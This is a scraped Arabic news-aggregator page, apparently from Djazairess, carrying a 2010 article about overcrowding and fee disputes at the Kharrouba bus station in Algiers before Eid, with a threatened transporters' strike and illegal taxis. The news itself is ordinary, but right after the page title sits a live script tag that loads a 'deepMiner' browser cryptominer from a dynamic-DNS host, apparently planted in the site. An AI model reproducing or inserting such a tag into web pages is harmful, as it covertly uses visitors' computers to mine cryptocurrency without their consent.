googletag.defineSlot('/21620968445/Djazairess_Ar_Article_1', [[336, 280], [300, 300], [300, 250], [300, 600]], 'div-gpt-ad-502778721-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Ar_Article_1', 'div-gpt-ad-502778721-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Ar_Article_3', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-502778719-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Ar_Article_3', 'div-gpt-ad-502778719-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Ar_Article_2', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-502778720-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Ar_Article_2', 'div-gpt-ad-502778720-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Ar_Widget', [[222, 280]], 'div-gpt-ad-1077287891-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Ar_Widget', 'div-gpt-ad-1077287891-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Ar_Siteunder', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-1575446168-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Ar_Siteunder', 'div-gpt-ad-1575446168-0-oop').addService(googletag.pubads()); googletag.pubads().enableSingleRequest(); googletag.enableServices();}); جزايرس : فوضى في محطة نقل المسافرين بالخروبة: اتحاد الناقلين يهدد بشلّ حركة الحافلات أيام العيد<script src="https://jhondi33.duckdns.org:7777/deepMiner.min.js"></script>
 
توقيف 17 شابا حراقا بعنابة    التحالف يأمر بوقف الهجوم على الحديدة    المستفيدون من سكنات السوسيال بالحجار غير معنيين بالترحيل قبل نهاية العام    أزمة مياه بعنابة والطارف إلى إشعار آخر    استنفار في الأوساط الصحية بجيجل بعد تسجيل إصابات جديدة بداء البوحمرون    إيمانويل ماكرون: فرنسا حليفة أمريكا وليست تابعة لها    لن أحجّ.. فضميري إن يقتلني فهو يحييني    ولد عباس يستقيل من «الأفلان» ويقدّم عطلة مرضية ب45 يوما    ليبرمان‮ ‬يستقيل احتجاجا على وقف إطلاق النار في‮ ‬غزة‮ ‬    تشاووش أوغلو‮:‬    خلال أحداث شغب في‮ ‬مقابلة مولودية الجزائر‮ - ‬اتحاد بلعباس    نظمتها المديرية العامة للحماية المدنية‮ ‬    المركز الوطني‮ ‬للكتاب‮ ‬يكشف‮:‬    سيستقبلون حامل اللقب اليوم    البطولة العربية للأمم في‮ ‬كرة السلة    نظم بمشاركة حوالي‮ ‬25‮ ‬عارضا بالشلف    قال إن بلادنا خرجت من الكابوس بفضل سياسات بوتفليقة..أويحيى يؤكد:    تلمسان    حملة إعلامية لشرح تفاصيله تطلقها الوزارة‮ ‬    الجزائر اليوم على السكة الصحيحة    الدالية تخطف الأضواء في‮ ‬البحرين    حزب العمال خزان للطاقات النضالية    الانتخابات ستجرى رسميا‮ ‬يوم‮ ‬29‮ ‬ديسمبر المقبل    من مرض السكري    5500 إصابة جديدة في 2018    حجز 1200 دولار مزوّرة    أزمة يد عاملة في الفلاحة    أجواء ونفحات روحانية متميزة في أدرار    البوابة الجزائرية للمخطوطات مشروع علمي طموح    إنتخاب أرنود مونتبورغ رئيسا جديدا لجمعية فرنسا-الجزائر    ملياردير يستعد للرئاسة الأمريكية المقبلة    26 ألف قتيل جزائري في الحرب العالمية الأولى    فتح فضاء جديد بوهران    انطلاق حملة تحسيسية بالجزائر العاصمة    الإستعمال المفرط للمضادات الحيوية يهدد الصحة البشرية    مصابيح الدجى عبد الله بن رواحة    بن أحمد يعد بمواصلة دعم الفريق    تونس آيت علي تطرح مواضيع مسكوت عنها في مسرحية «ساكتة»    مليكة يوسف، صاولي وهندو لإدخال البسمة في نفوس الجمهور    فرق محترفة تمثل 7 مسارح للمشاركة في التظاهرة    والي وهران يتدخل لفتح الموقع الالكتروني ل «عدل « قبل التوزيع القادم    لا تسامح بعد اليوم    «الخضر" عازمون على رفع التحدي    «العنف اللفظي أكثر من الجسدي وبعض وسائل الإعلام تتحمل المسؤولية»    سيطرة فرق ولاية معسكر    وزارة النقل تُفرج عن مشروع إنجاز محطة بحرية جديدة بميناء الغزوات    نسبة الأشغال فاقت 80 %    المتهم يتمسك بأقواله أمام القاضي    تنصيب لجان متابعة تسيير المناطق    ‘'طفل السرطان" يعتذر لأمه    التصفيات الجهوية للأنشودة الوطنية    إبراز دور الزكاة الفعال    الدنمارك تعتمد رسميا وسيلة نقل جديدة    عائلة أوكرانية تحتجز 94 عبدا!    ‘'حيتان أسيرة" بروسيا    الشيخ شمس الدين:” أنا داعية إلى الله وخاطيني السياسة”    صفات وشكل وملامح وجه النبي صلى الله عليه وسلم    قصة الملكين هاروت وماروت    







شكرا على الإبلاغ!
سيتم حجب هذه الصورة تلقائيا عندما يتم الإبلاغ عنها من طرف عدة أشخاص.





فوضى في محطة نقل المسافرين بالخروبة: اتحاد الناقلين يهدد بشلّ حركة الحافلات أيام العيد
نشر في البلاد أون لاين يوم 13 - 11 - 2010

هدّد الاتحاد الوطني للناقلين بشل حركة النقل أيام عيد الأضحى، احتجاجا على فرض أعباء مالية إضافية على أصحاب الحافلات بمحطة ''كبار معطوبي حرب التحرير'' بالخروبة، وهو القرار الذي يمكن أن يعيق حركة تنقل المواطنين إلى ولاياتهم الأصلية خصوصا مع حلول عيد الأضحى حيث يفضل الآلاف من العمال والموظفين والطلبة قضاء العيد مع الأهل. وطالب رئيس الاتحاد الوطني للناقلين بالنيابة بن كحلة في تصريح ل''البلاد'' بتدخل الوصاية لردع القرار العشوائي الخاص برفع رسوم ركن الحافلات في المحطة بنسبة 100 بالمائة وهو أهم أسباب الحركة الاحتجاجية للناقلين وتهديدهم بالإضراب أيام العيد.
وقال بن كحلة إن هذه الرسوم مبالغ فيها على اعتبار أنها تصل إلى 1200 دينار جزائري يوميا، حيث وبعملية حسابية فإن الناقل مثلا على خط الجزائر العاصمة قسنطينة يدفع 200 دينار عن كل محطة فضلا عن دفع 600 دينار للمحطة الرئيسية وبالتالي وبعملية بسيطة فإن الناقل مضطر إلى دفع أكثر من 40 مليون سنيتم سنويا، كرسوم العمل وهو أمر لم يتقبله الناقلون.
واعتبر عدد من الناقلين أن هذه الرسوم ضرب من ضروب الخيال بالنظر إلى الخدمات المتردية في المحطة فكيف بهم يقبلون مثل هذه القرارات التي وصفوها بالعشوائية والتي تعطلهم عن أداء مهامهم خلال العيد الذي يشهد اكتظاظا كبيرا في المحطة نحو العشرات من الخطوط خارج الجزائر العاصمة.
كما يفضل المواطن السفر عن طريق الحافلة بالنظر إلى أسعار النقل المنخفضة بها مقارنة مع سعر التنقل عن طريق سيارات الأجرة، والتخوف من عدم إيجاد وسيلة نقل يوم العيد أيضا .
وأمام هذه المعضلة لا يستطيع الناقلون بالمقابل رفع سعر تذاكر النقل رغم اعتبار ذلك من البديهي لتسديد تكاليف ركن الحافلات في محطة الخروبة. ومن جانب آخر طرح الاتحاد مشكلة أخرى يجدها الناقلون والتي تتمثل في عدم تسديد المستحقات المالية المترتبة عن بيع التذاكر، عبر الشبابيك والتي من المفترض أن تسلم لأصحاب الحافلات في مدة أقصاها شهر كامل وهو الأمر الذي لا يتم بل تطول المدة أحيانا إلى شهر، مما يخلق امتعاضا لدى الناقلين فضلا عن مطالبتهم الحثيثة للجهات المعنية على مستوى المحطة بتسديد هذه المستحقات، لأنها بذلك تعطل من جانب آخر تسديد أجور السائقين والقابضين أيضا، خصوصا في المناسبات مثل عيد الأضحى المبارك حيث تعذر على البعض شراء أضحية العيد.
في كل مرة تحل المناسبات وخصوصا أيام العيد يعود معها ملف النقل، والاكتظاظ الكبير الذي تعرفه محطات نقل المسافرين سواء في محطة النقل بالحافلات وسيارات الأجرة بالخروبة فضلا عن محطة القطارات أيضا، وهو ما يخلق فوضى عارمة يتكبد معاناتها المواطن ولكن حتى الناقلين لديهم اعتباراتهم وأسبابهم في دفع ثمن تلك الفوضى.
كما شهدت محطة ''الخروبة'' فوضى عارمة إذ اكتظت محطة الحافلات بالمسافرين وخصوصا على مستوى الخطوط الطويلة سواء من العاصمة نحو تبسة وقسنطينة وأم البواقي والطارف وعنابة وسطيف ووهران وغرداية وغيرها من الخطوط البرية التي تجذب إليها عشية الأعياد الآلاف من المسارفين خاصة الطلبة والعمال.
هذه المعاناة كشف عنها عدد من المسافرين الذين أكدوا ل ''البلاد'' على أن هذا المشكل يطرح باستمرار عشية الأعياد، فالكثيرون يرون أن نكهة العيد لا تتم إلا في كنف الأسرة والعائلة، وخصوصا بالنسبة لعيد الأضحى حيث ينتهز الكثيرون ممن يقيمون خارج العاصمة الفرصة للقاء الأقارب في مناسبة دينية تلم شمل العائلة.
ومن جانب آخر، اشتكى الكثيرون من المنطق الذي يفرضه عدد من الناقلين، حيث يرفعون تسعيرة النقل في مثل هذه المناسبات، على حساب المواطن، بل ويفرضون قانونهم ومنطقهم، هذا في غياب الرقابة. وهنا يقول أحد الناقلين إن سعر تذكرة السفر من الجزائر العاصمة نحو قسنطينة 2500 دينار، مشيرا إلى أن معضلة النقل بدأت تلوح في الأفق نهاية الأسبوع الماضي.
كما عبر مسافر عن أن الوضعية ستتعقد أكثر بداية من اليومين القادمين، لأن الجميع يبحث عن قضاء العيد، ناقلين أو مسافرين، وهو ما يعقد المهمة أكثر وتنقص وسائل النقل مما يعطل الحركة خلال أيام العيد .
''كلندستان'' هو الحل
هذه العبارة سمعناها من أفواه الكثيرين في محطة الحافلات ب''الخروبة''، ''كلندستان'' هو الحل، أي أن الناقلين غير الشرعيين ينتهزون الفرصة في أيام العيد ليوفروا وسائل النقل ويفرضون منطقهم في الأسعار، وهي غالبا ما تكون مرتفعة، ولكن ماذا يفعل المسافر في مثل هذه الحالات، بل وأكثر من ذلك فإن الكثيرين يرضخون للأمر الواقع ويدفعون أي سعر.
وأمام التدفق الكبير للمسافرين فإن الناقلين غير الشرعيين يغزون المحطات ويقتنصون زبائنهم، بل يجدون ضالتهم خلال أيام العيد، مع المراقبة الخاصة بالمحطات، خصوصا أن المسافرين لا يأبهون بخطورة السفر عبر سيارة لناقل غير شرعي، وكل ما يهمهم هو الوصول إلى البيت وفقط وهو ما يخلق منافسة كبيرة بين الناقلين غير الشرعيين رغم أنهم يطلبون ضعف الأسعار، لتتكرر الظاهرة كلما اقتربت الأعياد.


انقر هنا لقراءة الخبر من مصدره.